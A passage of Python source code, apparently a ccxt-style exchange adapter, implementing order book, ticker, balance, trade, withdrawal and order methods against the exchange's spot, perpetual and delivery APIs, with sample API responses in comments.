entry = response[i]
currencyId = self.safe_string(entry, 'currency')
code = self.safe_currency_code(currencyId)
withdrawFees[code] = {}
withdrawFix = self.safe_value(entry, 'withdraw_fix_on_chains')
if withdrawFix is None:
withdrawFix = {}
withdrawFix[code] = self.safe_number(entry, 'withdraw_fix')
keys = list(withdrawFix.keys())
for i in range(0, len(keys)):
key = keys[i]
withdrawFees[code][key] = self.parse_number(withdrawFix[key])
return {
'info': response,
'withdraw': withdrawFees,
'deposit': {},
}
def fetch_funding_history(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
# defaultType = 'future'
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchFundingHistory() requires the argument "symbol"')
market = self.market(symbol)
request = self.prepare_request(market)
request['type'] = 'fund' # 'dnw' 'pnl' 'fee' 'refr' 'fund' 'point_dnw' 'point_fee' 'point_refr'
if since is not None:
request['from'] = since
if limit is not None:
request['limit'] = limit
method = self.get_supported_mapping(market['type'], {
'swap': 'privateFuturesGetSettleAccountBook',
'futures': 'privateDeliveryGetSettleAccountBook',
})
response = getattr(self, method)(self.extend(request, params))
result = []
for i in range(0, len(response)):
entry = response[i]
timestamp = self.safe_timestamp(entry, 'time')
result.append({
'info': entry,
'symbol': symbol,
'code': self.safe_currency_code(self.safe_string(entry, 'text')),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'id': None,
'amount': self.safe_number(entry, 'change'),
})
return result
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
#
# request = {
# 'currency_pair': market['id'],
# 'interval': '0', # depth, 0 means no aggregation is applied, default to 0
# 'limit': limit, # maximum number of order depth data in asks or bids
# 'with_id': True, # return order book ID
# }
#
request = self.prepare_request(market)
spot = market['spot']
method = self.get_supported_mapping(market['type'], {
'spot': 'publicSpotGetOrderBook',
# 'margin': 'publicMarginGetOrderBook',
'swap': 'publicFuturesGetSettleOrderBook',
'futures': 'publicDeliveryGetSettleOrderBook',
})
if limit is not None:
request['limit'] = limit # default 10, max 100
response = getattr(self, method)(self.extend(request, params))
#
# SPOT
#
# {
# "current": 1634345973275,
# "update": 1634345973271,
# "asks": [
# ["2.2241","12449.827"],
# ["2.2242","200"],
# ["2.2244","826.931"],
# ["2.2248","3876.107"],
# ["2.225","2377.252"],
# ["2.22509","439.484"],
# ["2.2251","1489.313"],
# ["2.2253","714.582"],
# ["2.2254","1349.784"],
# ["2.2256","234.701"]],
# "bids":[
# ["2.2236","32.465"],
# ["2.2232","243.983"],
# ["2.2231","32.207"],
# ["2.223","449.827"],
# ["2.2228","7.918"],
# ["2.2227","12703.482"],
# ["2.2226","143.033"],
# ["2.2225","143.027"],
# ["2.2224","1369.352"],
# ["2.2223","756.063"]
# ]
# }
#
# Perpetual Swap
#
# {
# "current": 1634350208.745,
# "asks": [
# {"s":24909,"p": "61264.8"},
# {"s":81,"p": "61266.6"},
# {"s":2000,"p": "61267.6"},
# {"s":490,"p": "61270.2"},
# {"s":12,"p": "61270.4"},
# {"s":11782,"p": "61273.2"},
# {"s":14666,"p": "61273.3"},
# {"s":22541,"p": "61273.4"},
# {"s":33,"p": "61273.6"},
# {"s":11980,"p": "61274.5"}
# ],
# "bids": [
# {"s":41844,"p": "61264.7"},
# {"s":13783,"p": "61263.3"},
# {"s":1143,"p": "61259.8"},
# {"s":81,"p": "61258.7"},
# {"s":2471,"p": "61257.8"},
# {"s":2471,"p": "61257.7"},
# {"s":2471,"p": "61256.5"},
# {"s":3,"p": "61254.2"},
# {"s":114,"p": "61252.4"},
# {"s":14372,"p": "61248.6"}
# ],
# "update": 1634350208.724
# }
#
timestamp = self.safe_integer(response, 'current')
if not spot:
timestamp = timestamp * 1000
priceKey = 0 if spot else 'p'
amountKey = 1 if spot else 's'
return self.parse_order_book(response, symbol, timestamp, 'bids', 'asks', priceKey, amountKey)
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = self.prepare_request(market)
method = self.get_supported_mapping(market['type'], {
'spot': 'publicSpotGetTickers',
# 'margin': 'publicMarginGetTickers',
'swap': 'publicFuturesGetSettleTickers',
'futures': 'publicDeliveryGetSettleTickers',
})
response = getattr(self, method)(self.extend(request, params))
ticker = self.safe_value(response, 0)
return self.parse_ticker(ticker, market)
def parse_ticker(self, ticker, market=None):
#
# SPOT
#
# {
# "currency_pair": "KFC_USDT",
# "last": "7.255",
# "lowest_ask": "7.298",
# "highest_bid": "7.218",
# "change_percentage": "-1.18",
# "base_volume": "1219.053687865",
# "quote_volume": "8807.40299875455",
# "high_24h": "7.262",
# "low_24h": "7.095"
# }
#
# LINEAR/DELIVERY
#
# {
# "contract": "BTC_USDT",
# "last": "6432",
# "low_24h": "6278",
# "high_24h": "6790",
# "change_percentage": "4.43",
# "total_size": "32323904",
# "volume_24h": "184040233284",
# "volume_24h_btc": "28613220",
# "volume_24h_usd": "184040233284",
# "volume_24h_base": "28613220",
# "volume_24h_quote": "184040233284",
# "volume_24h_settle": "28613220",
# "mark_price": "6534",
# "funding_rate": "0.0001",
# "funding_rate_indicative": "0.0001",
# "index_price": "6531"
# }
#
marketId = self.safe_string_2(ticker, 'currency_pair', 'contract')
symbol = self.safe_symbol(marketId, market)
last = self.safe_number(ticker, 'last')
ask = self.safe_number(ticker, 'lowest_ask')
bid = self.safe_number(ticker, 'highest_bid')
high = self.safe_number(ticker, 'high_24h')
low = self.safe_number(ticker, 'low_24h')
baseVolume = self.safe_number_2(ticker, 'base_volume', 'volume_24h_base')
quoteVolume = self.safe_number_2(ticker, 'quote_volume', 'volume_24h_quote')
percentage = self.safe_number(ticker, 'change_percentage')
return self.safe_ticker({
'symbol': symbol,
'timestamp': None,
'datetime': None,
'high': high,
'low': low,
'bid': bid,
'bidVolume': None,
'ask': ask,
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': percentage,
'average': None,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
}, market)
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
defaultType = self.safe_string_2(self.options, 'fetchTickers', 'defaultType', 'spot')
type = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
method = self.get_supported_mapping(type, {
'spot': 'publicSpotGetTickers',
# 'margin': 'publicMarginGetTickers',
'swap': 'publicFuturesGetSettleTickers',
'futures': 'publicDeliveryGetSettleTickers',
})
request = {}
futures = type == 'futures'
swap = type == 'swap'
if (swap or futures) and ('settle' not in params):
request['settle'] = 'usdt' if swap else 'btc'
response = getattr(self, method)(self.extend(request, params))
return self.parse_tickers(response, symbols)
def fetch_balance(self, params={}):
# :param params.type: spot, margin, crossMargin, swap or future
# :param params.settle: Settle currency(usdt or btc) for perpetual swap and futures
self.load_markets()
defaultType = self.safe_string_2(self.options, 'fetchBalance', 'defaultType', 'spot')
type = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
swap = type == 'swap'
futures = type == 'futures'
method = self.get_supported_mapping(type, {
'spot': 'privateSpotGetAccounts',
# 'margin': 'publicMarginGetTickers',
'swap': 'privateFuturesGetSettleAccounts',
'futures': 'privateDeliveryGetSettleAccounts',
})
request = {}
response = []
if swap or futures:
defaultSettle = 'usdt' if swap else 'btc'
request['settle'] = self.safe_string(params, 'settle', defaultSettle)
response_item = getattr(self, method)(self.extend(request, params))
response = [response_item]
else:
response = getattr(self, method)(self.extend(request, params))
# SPOT
# [
# {
# "currency": "DBC",
# "available": "0",
# "locked": "0"
# },
# ...
# ]
#
# Perpetual Swap
# {
# order_margin: "0",
# point: "0",
# bonus: "0",
# history: {
# dnw: "2.1321",
# pnl: "11.5351",
# refr: "0",
# point_fee: "0",
# fund: "-0.32340576684",
# bonus_dnw: "0",
# point_refr: "0",
# bonus_offset: "0",
# fee: "-0.20132775",
# point_dnw: "0",
# },
# unrealised_pnl: "13.315100000006",
# total: "12.51345151332",
# available: "0",
# in_dual_mode: False,
# currency: "USDT",
# position_margin: "12.51345151332",
# user: "6333333",
# }
#
# Delivery Future
# {
# order_margin: "0",
# point: "0",
# history: {
# dnw: "1",
# pnl: "0",
# refr: "0",
# point_fee: "0",
# point_dnw: "0",
# settle: "0",
# settle_fee: "0",
# point_refr: "0",
# fee: "0",
# },
# unrealised_pnl: "0",
# total: "1",
# available: "1",
# currency: "USDT",
# position_margin: "0",
# user: "6333333",
# }
result = {}
for i in range(0, len(response)):
entry = response[i]
account = self.account()
currencyId = self.safe_string(entry, 'currency')
code = self.safe_currency_code(currencyId)
account['used'] = self.safe_string_2(entry, 'locked', 'position_margin')
account['free'] = self.safe_string(entry, 'available')
result[code] = account
return self.parse_balance(result)
def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
price = self.safe_string(params, 'price')
request = self.prepare_request(market)
request['interval'] = self.timeframes[timeframe]
method = 'publicSpotGetCandlesticks'
if market['contract']:
if market['futures']:
method = 'publicDeliveryGetSettleCandlesticks'
elif market['swap']:
method = 'publicFuturesGetSettleCandlesticks'
isMark = (price == 'mark')
isIndex = (price == 'index')
if isMark or isIndex:
request['contract'] = price + '_' + market['id']
params = self.omit(params, 'price')
if since is None:
if limit is not None:
request['limit'] = limit
else:
request['from'] = int(since / 1000)
if limit is not None:
request['to'] = self.sum(request['from'], limit * self.parse_timeframe(timeframe) - 1)
response = getattr(self, method)(self.extend(request, params))
return self.parse_ohlcvs(response, market, timeframe, since, limit)
def fetch_mark_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
request = {
'price': 'mark',
}
return self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params))
def fetch_funding_rate_history(self, symbol=None, limit=None, since=None, params={}):
self.load_markets()
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchFundingRateHistory() requires a symbol argument')
market = self.market(symbol)
request = {
'contract': market['id'],
'settle': market['quote'].lower(),
}
if limit is not None:
request['limit'] = limit
method = 'publicFuturesGetSettleFundingRate'
response = getattr(self, method)(self.extend(request, params))
#
# {
# "r": "0.00063521",
# "t": "1621267200000",
# }
#
rates = []
for i in range(0, len(response)):
entry = response[i]
timestamp = self.safe_timestamp(entry, 't')
rates.append({
'info': entry,
'symbol': symbol,
'fundingRate': self.safe_number(entry, 'r'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
})
return self.sort_by(rates, 'timestamp')
def fetch_index_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
request = {
'price': 'index',
}
return self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params))
def parse_ohlcv(self, ohlcv, market=None):
#
# Spot market candles
#
# [
# "1626163200", # Unix timestamp in seconds
# "346711.933138181617", # Trading volume
# "33165.23", # Close price
# "33260", # Highest price
# "33117.6", # Lowest price
# "33184.47" # Open price
# ]
#
# Mark and Index price candles
#
# {
# "t":1632873600, # Unix timestamp in seconds
# "o": "41025", # Open price
# "h": "41882.17", # Highest price
# "c": "41776.92", # Close price
# "l": "40783.94" # Lowest price
# }
#
if isinstance(ohlcv, list):
return [
self.safe_timestamp(ohlcv, 0), # unix timestamp in seconds
self.safe_number(ohlcv, 5), # open price
self.safe_number(ohlcv, 3), # highest price
self.safe_number(ohlcv, 4), # lowest price
self.safe_number(ohlcv, 2), # close price
self.safe_number(ohlcv, 1), # trading volume
]
else:
# Mark and Index price candles
return [
self.safe_timestamp(ohlcv, 't'), # unix timestamp in seconds
self.safe_number(ohlcv, 'o'), # open price
self.safe_number(ohlcv, 'h'), # highest price
self.safe_number(ohlcv, 'l'), # lowest price
self.safe_number(ohlcv, 'c'), # close price
self.safe_number(ohlcv, 'v'), # trading volume, None for mark or index price
]
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
#
# spot
#
# request = {
# 'currency_pair': market['id'],
# 'limit': limit, # maximum number of records to be returned in a single list
# 'last_id': 'id', # specify list starting point using the id of last record in previous list-query results
# 'reverse': False, # True to retrieve records where id is smaller than the specified last_id, False to retrieve records where id is larger than the specified last_id
# }
#
# swap, futures
#
# request = {
# 'settle': market['settleId'],
# 'contract': market['id'],
# 'limit': limit, # maximum number of records to be returned in a single list
# 'last_id': 'id', # specify list starting point using the id of last record in previous list-query results
# 'from': int(since / 1000), # starting time in seconds, if not specified, to and limit will be used to limit response items
# 'to': self.seconds(), # end time in seconds, default to current time
# }
#
request = self.prepare_request(market)
method = self.get_supported_mapping(market['type'], {
'spot': 'publicSpotGetTrades',
# 'margin': 'publicMarginGetTickers',
'swap': 'publicFuturesGetSettleTrades',
'futures': 'publicDeliveryGetSettleTrades',
})
if limit is not None:
request['limit'] = limit # default 100, max 1000
if since is not None and (market['contract']):
request['from'] = int(since / 1000)
response = getattr(self, method)(self.extend(request, params))
#
# spot
#
# [
# {
# id: "1852958144",
# create_time: "1634673259",
# create_time_ms: "1634673259378.105000",
# currency_pair: "ADA_USDT",
# side: "sell",
# amount: "307.078",
# price: "2.104",
# }
# ]
#
# perpetual swap
#
# [
# {
# size: "2",
# id: "2522911",
# create_time_ms: "1634673380.182",
# create_time: "1634673380.182",
# contract: "ADA_USDT",
# price: "2.10486",
# }
# ]
#
return self.parse_trades(response, market, since, limit)
def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
#
# request = {
# 'currency_pair': market['id'],
# # 'limit': limit,
# # 'page': 0,
# # 'order_id': 'Order ID',
# # 'account': 'spot', # default to spot and margin account if not specified, set to cross_margin to operate against margin account
# # 'from': since, # default to 7 days before current time
# # 'to': self.milliseconds(), # default to current time
# }
#
request = self.prepare_request(market)
if limit is not None:
request['limit'] = limit # default 100, max 1000
if since is not None:
request['from'] = int(since / 1000)
# request['to'] = since + 7 * 24 * 60 * 60
method = self.get_supported_mapping(market['type'], {
'spot': 'privateSpotGetMyTrades',
# 'margin': 'publicMarginGetCurrencyPairs',
'swap': 'privateFuturesGetSettleMyTrades',
'futures': 'privateDeliveryGetSettleMyTrades',
})
response = getattr(self, method)(self.extend(request, params))
# SPOT
# [{
# id: "1851927191",
# create_time: "1634333360",
# create_time_ms: "1634333360359.901000",
# currency_pair: "BTC_USDT",
# side: "buy",
# role: "taker",
# amount: "0.0001",
# price: "62547.51",
# order_id: "93475897349",
# fee: "2e-07",
# fee_currency: "BTC",
# point_fee: "0",
# gt_fee: "0",
# }]
# Perpetual Swap
# [{
# size: "-13",
# order_id: "79723658958",
# id: "47612669",
# role: "taker",
# create_time: "1634600263.326",
# contract: "BTC_USDT",
# price: "61987.8",
# }]
return self.parse_trades(response, market, since, limit)
def parse_trade(self, trade, market=None):
#
# public
#
# {
# "id": "1334253759",
# "create_time": "1626342738",
# "create_time_ms": "1626342738331.497000",
# "currency_pair": "BTC_USDT",
# "side": "sell",
# "amount": "0.0022",
# "price": "32452.16"
# }
#
# private
#
# {
# "id": "218087755",
# "create_time": "1578958740",
# "create_time_ms": "1578958740122.710000",
# "currency_pair": "BTC_USDT",
# "side": "sell",
# "role": "taker",
# "amount": "0.0004",
# "price": "8112.77",
# "order_id": "8445563839",
# "fee": "0.006490216",
# "fee_currency": "USDT",
# "point_fee": "0",
# "gt_fee": "0"
# }
#
id = self.safe_string(trade, 'id')
timestampStringContract = self.safe_string(trade, 'create_time')
timestampString = self.safe_string_2(trade, 'create_time_ms', 'time', timestampStringContract)
timestamp = None
if timestampString.find('.') > 0:
milliseconds = timestampString.split('.')
timestamp = int(milliseconds[0])
if market['contract']:
timestamp = timestamp * 1000
marketId = self.safe_string_2(trade, 'currency_pair', 'contract')
symbol = self.safe_symbol(marketId, market)
amountString = self.safe_string_2(trade, 'amount', 'size')
priceString = self.safe_string(trade, 'price')
costString = Precise.string_abs(Precise.string_mul(amountString, priceString))
price = self.parse_number(priceString)
cost = self.parse_number(costString)
contractSide = 'sell' if Precise.string_lt(amountString, '0') else 'buy'
amountString = Precise.string_abs(amountString)
amount = self.parse_number(amountString)
side = self.safe_string(trade, 'side', contractSide)
orderId = self.safe_string(trade, 'order_id')
gtFee = self.safe_string(trade, 'gt_fee')
feeCurrency = None
feeCost = None
if gtFee == '0':
feeCurrency = self.safe_string(trade, 'fee_currency')
feeCost = self.safe_number(trade, 'fee')
else:
feeCurrency = 'GT'
feeCost = self.parse_number(gtFee)
fee = {
'cost': feeCost,
'currency': feeCurrency,
}
takerOrMaker = self.safe_string(trade, 'role')
return {
'info': trade,
'id': id,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'order': orderId,
'type': None,
'side': side,
'takerOrMaker': takerOrMaker,
'price': price,
'amount': amount,
'cost': cost,
'fee': fee,
}
def fetch_deposits(self, code=None, since=None, limit=None, params={}):
self.load_markets()
request = {}
currency = None
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
if limit is not None:
request['limit'] = limit
if since is not None:
request['from'] = int(since / 1000)
request['to'] = request['from'] + 30 * 24 * 60 * 60
response = self.privateWalletGetDeposits(self.extend(request, params))
return self.parse_transactions(response, currency)
def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
self.load_markets()
request = {}
currency = None
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
if limit is not None:
request['limit'] = limit
if since is not None:
request['from'] = int(since / 1000)
request['to'] = request['from'] + 30 * 24 * 60 * 60
response = self.privateWalletGetWithdrawals(self.extend(request, params))
return self.parse_transactions(response, currency)
def withdraw(self, code, amount, address, tag=None, params={}):
tag, params = self.handle_withdraw_tag_and_params(tag, params)
self.check_address(address)
self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
'address': address,
'amount': self.currency_to_precision(code, amount),
}
if tag is not None:
request['memo'] = tag
networks = self.safe_value(self.options, 'networks', {})
network = self.safe_string_upper(params, 'network')  # this line allows the user to specify either ERC20 or ETH
network = self.safe_string_lower(networks, network, network) # handle ETH>ERC20 alias
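# hypothetical usage sketch, address and network values are placeholders, not from this file:
# withdraw('USDT', 50, 'TUu2...', None, {'network': 'TRC20'}) resolves the alias through
# self.options['networks'] and sends the result as the 'chain' field of the request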
if network is not None:
request['chain'] = network
params = self.omit(params, 'network')
response = self.privateWithdrawalsPost(self.extend(request, params))
#
# {
# "id": "w13389675",
# "currency": "USDT",
# "amount": "50",
# "address": "TUu2rLFrmzUodiWfYki7QCNtv1akL682p1",
# "memo": null
# }
#
currencyId = self.safe_string(response, 'currency')
id = self.safe_string(response, 'id')
return {
'info': response,
'id': id,
'code': self.safe_currency_code(currencyId),
'amount': self.safe_number(response, 'amount'),
'address': self.safe_string(response, 'address'),
'tag': self.safe_string(response, 'memo'),
}
def parse_transaction_status(self, status):
statuses = {
'PEND': 'pending',
'REQUEST': 'pending',
'DMOVE': 'pending',
'CANCEL': 'failed',
'DONE': 'ok',
}
return self.safe_string(statuses, status, status)
def parse_transaction_type(self, type):
types = {
'd': 'deposit',
'w': 'withdrawal',
}
return self.safe_string(types, type, type)
def parse_transaction(self, transaction, currency=None):
#
# deposits
#
# {
# "id": "d33361395",
# "currency": "USDT_TRX",
# "address": "TErdnxenuLtXfnMafLbfappYdHtnXQ5U4z",
# "amount": "100",
# "txid": "ae9374de34e558562fe18cbb1bf9ab4d9eb8aa7669d65541c9fa2a532c1474a0",
# "timestamp": "1626345819",
# "status": "DONE",
# "memo": ""
# }
#
# withdrawals
id = self.safe_string(transaction, 'id')
type = None
if id is not None:
type = self.parse_transaction_type(id[0])
currencyId = self.safe_string(transaction, 'currency')
code = self.safe_currency_code(currencyId)
amount = self.safe_number(transaction, 'amount')
txid = self.safe_string(transaction, 'txid')
rawStatus = self.safe_string(transaction, 'status')
status = self.parse_transaction_status(rawStatus)
address = self.safe_string(transaction, 'address')
fee = self.safe_number(transaction, 'fee')
tag = self.safe_string(transaction, 'memo')
if tag == '':
tag = None
timestamp = self.safe_timestamp(transaction, 'timestamp')
return {
'info': transaction,
'id': id,
'txid': txid,
'currency': code,
'amount': amount,
'address': address,
'tag': tag,
'status': status,
'type': type,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'fee': fee,
}
def create_order(self, symbol, type, side, amount, price=None, params={}):
#
# :param(str) symbol: base/quote currency pair
# :param(str) type: Order type(limit, market, ...)
# :param(str) side: buy or sell
# :param(number) amount: Amount of base currency ordered
# :param(number) price: Price of the base currency using quote currency
# :param(dict) params:
# - type: market type(spot, futures, ...)
# - reduceOnly
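# hypothetical usage sketch, symbol/amount/price are placeholders, not from this file:
# create_order('BTC/USDT', 'limit', 'buy', 0.0001, 30000, {'type': 'spot'}) builds a spot limit order,
# while contract markets negate the size for sells and send 'size' instead of 'amount' (see below)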
self.load_markets()
market = self.market(symbol)
defaultType = self.safe_string_2(self.options, 'createOrder', 'defaultType', 'spot')
marketType = self.safe_string(params, 'type', defaultType)
contract = market['contract']
request = self.prepare_request(market)
reduceOnly = self.safe_value(params, 'reduceOnly')
params = self.omit(params, 'reduceOnly')
if reduceOnly is not None:
if not contract:
raise InvalidOrder(self.id + ' createOrder() does not support reduceOnly for ' + marketType + ' orders, reduceOnly orders are supported for futures and perpetuals only')
request['reduce_only'] = reduceOnly
if contract:
if side == 'sell':
amount = 0 - amount
request['size'] = self.parse_number(self.amount_to_precision(symbol, amount))
else:
request['side'] = side
request['type'] = type
request['amount'] = self.amount_to_precision(symbol, amount)
request['account'] = marketType
# if margin:
# if entering trade:
# request['auto_borrow'] = True
# elif exiting trade:
# request['auto_repay'] = True
# }
# }
if type == 'limit':
if not price:
raise ArgumentsRequired('Argument price is required for ' + self.id + '.createOrder for limit orders')
request['price'] = self.price_to_precision(symbol, price)
elif (type == 'market') and contract:
request['tif'] = 'ioc'
request['price'] = 0
method = self.get_supported_mapping(market['type'], {
'spot': 'privateSpotPostOrders',
# 'margin': 'privateSpotPostOrders',
'swap': 'privateFuturesPostSettleOrders',
'futures': 'privateDeliveryPostSettleOrders',
})
response = getattr(self, method)(self.extend(request, params))
return self.parse_order(response, market)
def parse_order_status(self, status):
statuses = {
'filled': 'closed',
'cancelled': 'canceled',
'liquidated': 'closed',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
#
# createOrder, spot
#
# {
# "id": "62364648575",
# "text": "apiv4",
# "create_time": "1626354834",
# "update_time": "1626354834",
# "create_time_ms": "1626354833544",
# "update_time_ms": "1626354833544",
# "status": "open",
# "currency_pair": "BTC_USDT",
# "type": "limit",
# "account": "spot",
# "side": "buy",
# "amount": "0.0001",
# "price": "30000",
# "time_in_force": "gtc",
# "iceberg": "0",
# "left": "0.0001",
# "fill_price": "0",
# "filled_total": "0",
# "fee": "0",
# "fee_currency": "BTC",
# "point_fee": "0",
# "gt_fee": "0",
# "gt_discount": True,
# "rebated_fee": "0",
# "rebated_fee_currency": "USDT"
# }
#
#
id = self.safe_string(order, 'id')
marketId = self.safe_string_2(order, 'currency_pair', 'contract')
symbol = self.safe_symbol(marketId, market)
timestamp = self.safe_timestamp(order, 'create_time')
timestamp = self.safe_integer(order, 'create_time_ms', timestamp)
lastTradeTimestamp = self.safe_timestamp(order, 'update_time')
lastTradeTimestamp = self.safe_integer(order, 'update_time_ms', lastTradeTimestamp)
amountRaw = self.safe_string_2(order, 'amount', 'size')
amount = Precise.string_abs(amountRaw)
price = self.safe_string(order, 'price')
average = self.safe_string(order, 'fill_price')
remaining = self.safe_string(order, 'left')
cost = self.safe_string(order, 'filled_total') # same as filled_price
rawStatus = None
side = None
contract = self.safe_value(market, 'contract')
if contract:
side = 'buy' if Precise.string_gt(amountRaw, '0') else 'sell'
rawStatus = self.safe_string(order, 'finish_as', 'open')
else:
# open, closed, cancelled - almost already ccxt unified!
rawStatus = self.safe_string(order, 'status')
side = self.safe_string(order, 'side')
status = self.parse_order_status(rawStatus)
type = self.safe_string(order, 'type')
timeInForce = self.safe_string_upper_2(order, 'time_in_force', 'tif')
fees = []
gtFee = self.safe_number(order, 'gt_fee')
if gtFee:
fees.append({
'currency': 'GT',
'cost': gtFee,
})
fee = self.safe_number(order, 'fee')
if fee:
fees.append({
'currency': self.safe_currency_code(self.safe_string(order, 'fee_currency')),
'cost': fee,
})
rebate = self.safe_string(order, 'rebated_fee')
if rebate:
fees.append({
'currency': self.safe_currency_code(self.safe_string(order, 'rebated_fee_currency')),
'cost': self.parse_number(Precise.string_neg(rebate)),
})
mkfr = self.safe_number(order, 'mkfr')
tkfr = self.safe_number(order, 'tkfr')
if mkfr:
fees.append({
'currency': self.safe_currency_code(self.safe_string(market, 'settleId')),
'cost': mkfr,
})
if tkfr:
fees.append({
'currency': self.safe_currency_code(self.safe_string(market, 'settleId')),
'cost': tkfr,
})
return self.safe_order2({
'id': id,
'clientOrderId': id,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': lastTradeTimestamp,
'status': status,
'symbol': symbol,
'type': type,
'timeInForce': timeInForce,
'postOnly': None,
'side': side,
'price': price,
'stopPrice': None,
'average': average,
'amount': amount,
'cost': cost,
'filled': None,
'remaining': remaining,
'fee': None,
'fees': fees,
'trades': None,
'info': order,
}, market)
def fetch_order(self, id, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrder() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'order_id': id,
}
if market['spot'] or market['margin']:
request['currency_pair'] = market['id']
else:
request['settle'] = market['settleId']
method = self.get_supported_mapping(market['type'], {
'spot': 'privateSpotGetOrdersOrderId',
# 'margin': 'publicMarginGetTickers',
'swap': 'privateFuturesGetSettleOrdersOrderId',
'futures': 'privateDeliveryGetSettlePriceOrdersOrderId',
})
response = getattr(self, method)(self.extend(request, params))
return self.parse_order(response, market)
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
defaultType = self.safe_string_2(self.options, 'fetchMarkets', 'defaultType', 'spot')
type = self.safe_string(params, 'type', defaultType)
if symbol is None and (type == 'spot' or type == 'margin' or type == 'cross_margin'):
request = {
# 'page': 1,
# 'limit': limit,
'account': type, # spot/margin(default), cross_margin
}
if limit is not None:
request['limit'] = limit
response = self.privateSpotGetOpenOrders(self.extend(request, params))
#
# [
# {
# "currency_pair": "ETH_BTC",
# "total": 1,
# "orders": [
# {
# "id": "12332324",
# "text": "t-123456",
# "create_time": "1548000000",
# "update_time": "1548000100",
# "currency_pair": "ETH_BTC",
# "status": "open",
# "type": "limit",
# "account": "spot",
# "side": "buy",
# "amount": "1",
# "price": "5.00032",
# "time_in_force": "gtc",
# "left": "0.5",
# "filled_total": "2.50016",
# "fee": "0.005",
# "fee_currency": "ETH",
# "point_fee": "0",
# "gt_fee": "0",
# "gt_discount": False,
# "rebated_fee": "0",
# "rebated_fee_currency": "BTC"
# }
# ]
# },
# ...
# ]
#
allOrders = []
for i in range(0, len(response)):
entry = response[i]
orders = self.safe_value(entry, 'orders', [])
parsed = self.parse_orders(orders, None, since, limit)
allOrders = self.array_concat(allOrders, parsed)
return self.filter_by_since_limit(allOrders, since, limit)
return self.fetch_orders_by_status('open', symbol, since, limit, params)
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
return self.fetch_orders_by_status('finished', symbol, since, limit, params)
def fetch_orders_by_status(self, status, symbol=None, since=None, limit=None, params={}):
self.load_markets()
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrdersByStatus() requires a symbol argument')
market = self.market(symbol)
request = self.prepare_request(market)
request['status'] = status
if limit is not None:
request['limit'] = limit
if since is not None and (market['spot'] or market['margin']):
request['start'] = int(since / 1000)
method = self.get_supported_mapping(market['type'], {
'spot': 'privateSpotGetOrders',
'margin': 'privateSpotGetOrders',
'swap': 'privateFuturesGetSettleOrders',
'futures': 'privateDeliveryGetSettleOrders',
})
if market['type'] == 'margin' or market['type'] == 'cross_margin':
request['account'] = market['type']
response = getattr(self, method)(self.extend(request, params))
# SPOT
# {
# "id":"8834234273",
# "text": "3",
# "create_time": "1635406193",
# "update_time": "1635406193",
# "create_time_ms": 1635406193361,
# "update_time_ms": 1635406193361,
# "status": "closed",
# "currency_pair": "BTC_USDT",
# "type": "limit",
# "account": "spot",
# "side": "sell",
# "amount": "0.0002",
# "price": "58904.01",
# "time_in_force":"gtc",
# "iceberg": "0",
# "left": "0.0000",
# "fill_price": "11.790516",
# "filled_total": "11.790516",
# "fee": "0.023581032",
# "fee_currency": "USDT",
# "point_fee": "0",
# "gt_fee": "0",
# "gt_discount": False,
# "rebated_fee_currency": "BTC"
# }
# Perpetual Swap
# {
# "status": "finished",
# "size":-1,
# "left":0,
# "id":82750739203,
# "is_liq":false,
# "is_close":false,
# "contract": "BTC_USDT",
# "text": "web",
# "fill_price": "60721.3",
# "finish_as": "filled",
# "iceberg":0,
# "tif": "ioc",
# "is_reduce_only":true,
# "create_time": 1635403475.412,
# "finish_time": 1635403475.4127,
# "price": "0"
# }
return self.parse_orders(response, market, since, limit)
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
if symbol is None:
raise ArgumentsRequired(self.id + ' cancelOrder() requires a symbol argument')
market = self.market(symbol)
request = {
'order_id': id,
}
if market['contract']:
request['settle'] = market['settleId']
else:
request['currency_pair'] = market['id']
method = self.get_supported_mapping(market['type'], {
'spot': 'privateSpotDeleteOrdersOrderId',
'margin': 'privateSpotDeleteOrdersOrderId',
'swap': 'privateFuturesDeleteSettleOrdersOrderId',
'futures': 'privateDeliveryDeleteSettleOrdersOrderId',
})
response = getattr(self, method)(self.extend(request, params))
# Perpetual swap
# {
# id: "82241928192",
# contract: "BTC_USDT",
# mkfr: "0",
# tkfr: "0.0005",
# tif: "gtc",
# is_reduce_only: False,
# create_time: "1635196145.06",
# finish_time: "1635196233.396",
# price: "61000",
# size: "4",
# refr: "0",
# left: "4",
# text: "web",
# fill_price: "0",
# user: "6693577",
